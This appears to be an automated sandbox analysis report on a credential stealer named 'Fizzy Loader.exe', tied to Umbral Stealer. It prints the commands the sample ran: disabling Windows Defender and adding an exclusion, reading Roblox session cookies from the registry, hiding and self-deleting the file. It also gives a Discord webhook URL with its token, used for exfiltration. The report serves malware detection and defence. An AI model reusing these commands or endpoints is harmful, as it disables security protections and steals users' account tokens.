                        Source: powershell.exe, 00000006.00000002.2065728225.0000027705C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2107422944.000001CC0F7D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2107422944.000001CC0F7EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D0600E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABCE51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE3000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                        Source: ukUGV.scr.0.drString found in binary or memory: https://discord.com/api/v10/users/
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1J
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                        Source: ukUGV.scr.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-StealerhT
                        Source: powershell.exe, 00000016.00000002.2405447937.000001EABE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                        Source: powershell.exe, 00000006.00000002.2087596667.0000027715CA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D061A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.000002051007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.00000205019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACCECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49939 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: Fizzy Loader.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F532180_2_00007FF848F53218
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F472280_2_00007FF848F47228
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F59AC00_2_00007FF848F59AC0
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F5F1A80_2_00007FF848F5F1A8
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F5F1D00_2_00007FF848F5F1D0
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F5E3D90_2_00007FF848F5E3D9
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F5EEC80_2_00007FF848F5EEC8
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F8B8100_2_00007FF848F8B810
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F5E8180_2_00007FF848F5E818
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F558480_2_00007FF848F55848
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F4E0720_2_00007FF848F4E072
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F9C6F80_2_00007FF848F9C6F8
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F5EAA80_2_00007FF848F5EAA8
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F636B00_2_00007FF848F636B0
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF84910C2A50_2_00007FF84910C2A5
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491165210_2_00007FF849116521
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491189220_2_00007FF849118922
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491101680_2_00007FF849110168
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF84910F1690_2_00007FF84910F169
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF84910B44E0_2_00007FF84910B44E
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491084560_2_00007FF849108456
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF849103CD40_2_00007FF849103CD4
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491026A50_2_00007FF8491026A5
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491116F10_2_00007FF8491116F1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491146CA0_2_00007FF8491146CA
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF84910DD020_2_00007FF84910DD02
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491101500_2_00007FF849110150
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491101880_2_00007FF849110188
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491101900_2_00007FF849110190
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491005F50_2_00007FF8491005F5
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF84910300D0_2_00007FF84910300D
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF849101C350_2_00007FF849101C35
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491110F00_2_00007FF8491110F0
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF849110B720_2_00007FF849110B72
                        Source: Fizzy Loader.exe, 00000000.00000000.1996533714.00000172AEDBC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs Fizzy Loader.exe
                        Source: Fizzy Loader.exeBinary or memory string: OriginalFilename vs Fizzy Loader.exe
                        Source: Fizzy Loader.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: Fizzy Loader.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: Fizzy Loader.exe, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: ukUGV.scr.0.dr, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: ukUGV.scr.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: ukUGV.scr.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Fizzy Loader.exe, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Fizzy Loader.exe, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@40/24@3/2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Fizzy Loader.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeMutant created: \Sessions\1\BaseNamedObjects\HKQNYcyfGFyt4qEz2DFc
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\Users\user\AppData\Local\Temp\6q9sUybuLkTYpBGJump to behavior
                        Source: Fizzy Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Fizzy Loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: JZ0HaEj6FntZgfK.0.dr, WfftaKcf4Djlzm1.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Fizzy Loader.exeReversingLabs: Detection: 73%
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile read: C:\Users\user\Desktop\Fizzy Loader.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Fizzy Loader.exe "C:\Users\user\Desktop\Fizzy Loader.exe"
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: cryptsp.dllJump to behavior
